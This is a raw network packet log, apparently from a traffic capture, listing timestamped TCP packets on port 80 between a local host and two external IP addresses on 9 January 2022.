Jan 9, 2022 18:48:50.864048958 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864063978 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864085913 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864099026 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864124060 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864131927 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864161968 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864170074 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864197969 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864211082 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864237070 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864245892 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864274979 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864284992 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864315033 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864320993 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864355087 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864362001 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864391088 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864401102 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864430904 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864439964 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864469051 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864485025 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864505053 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864518881 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864542961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864552021 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864581108 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864588022 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864619017 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864633083 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864659071 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864669085 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864695072 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864710093 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864733934 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864741087 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864772081 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864780903 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864808083 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864816904 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864859104 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864886045 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864926100 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864936113 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.864964008 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.864974022 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.865003109 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.865010977 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.865041018 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.865048885 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.865078926 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.865087032 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.865117073 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.865124941 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.865155935 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.865166903 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.865194082 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.865206957 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.865241051 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892126083 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892183065 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892204046 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892221928 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892232895 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892260075 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892299891 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892299891 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892314911 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892338991 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892352104 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892378092 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892394066 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892417908 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892452955 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892456055 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892463923 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892496109 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892505884 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892534971 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892544031 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892571926 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892586946 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892610073 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892631054 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892647982 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892653942 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892685890 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892697096 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892726898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892735958 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892762899 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892776012 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892802000 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892812014 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892841101 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892865896 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892899036 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892916918 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892956018 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.892970085 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.892995119 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893014908 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893030882 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893045902 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893069983 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893085003 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893109083 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893117905 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893145084 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893158913 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893184900 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893198013 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893223047 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893235922 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893261909 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893271923 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893301964 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893316031 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893337965 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893352985 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893378019 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893385887 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893414974 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893429041 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893454075 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893467903 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893492937 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893507957 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893531084 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893544912 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893568993 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893583059 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893608093 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893642902 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893644094 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893662930 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893683910 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893702030 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893722057 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893738031 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893758059 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893779993 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893795967 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893804073 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893834114 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893852949 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893873930 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893891096 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893913031 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893928051 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893949986 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.893965960 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.893989086 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894002914 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894027948 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894036055 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894063950 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894077063 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894104004 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894124985 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894143105 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894145012 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894181967 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894190073 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894220114 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894231081 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894258022 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894270897 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894295931 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894304037 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894334078 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894347906 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894370079 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894387960 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894408941 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894418001 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894447088 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894468069 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894484997 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894486904 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894525051 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894540071 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894562960 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894577980 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894602060 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894617081 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894640923 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894653082 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894678116 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894714117 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894716978 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894731998 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894753933 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894768000 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894792080 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894810915 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894830942 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894846916 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894876003 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894891024 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894915104 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894925117 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.894956112 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.894992113 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895019054 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895030022 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895030975 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895037889 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895067930 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895086050 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895103931 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895132065 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895142078 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895149946 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895179987 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895196915 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895219088 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895237923 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895257950 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895272017 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895294905 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895333052 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895334005 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895345926 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895371914 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895379066 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895407915 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895421982 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895446062 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895459890 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895483971 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895497084 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895522118 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895531893 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895560980 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895574093 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895597935 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895612001 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895637035 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895648003 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895675898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895689964 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895711899 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895725965 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895750046 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895759106 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895787001 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895800114 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895824909 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895839930 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895864010 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895879984 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895900965 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895915985 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895939112 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895952940 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.895977020 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.895987034 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896013021 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896025896 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896050930 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896065950 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896089077 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896102905 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896127939 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896142960 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896167040 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896179914 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896203041 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896215916 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896240950 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896250010 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896279097 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896292925 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896315098 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896330118 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896353006 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896367073 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896389961 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896418095 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896428108 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896429062 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896466017 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896485090 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896503925 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896543026 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896544933 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896554947 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896579981 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896593094 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896615982 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896622896 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896653891 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896660089 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896691084 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896697044 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896729946 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:50.896733046 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:50.896773100 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.045069933 CET	80	49866	211.119.84.112	192.168.2.3
Jan 9, 2022 18:48:51.046456099 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046509027 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046549082 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046588898 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046624899 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046664000 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046701908 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046709061 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.046739101 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046777010 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046785116 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.046814919 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046843052 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.046855927 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046899080 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046912909 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.046936035 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046973944 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.046991110 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047013044 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047049046 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047063112 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047086954 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047123909 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047137976 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047163963 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047203064 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047218084 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047240019 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047276974 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047283888 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047316074 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047352076 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047365904 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047389984 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047429085 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.047436953 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.047466993 CET	80	49865	47.251.44.201	192.168.2.3
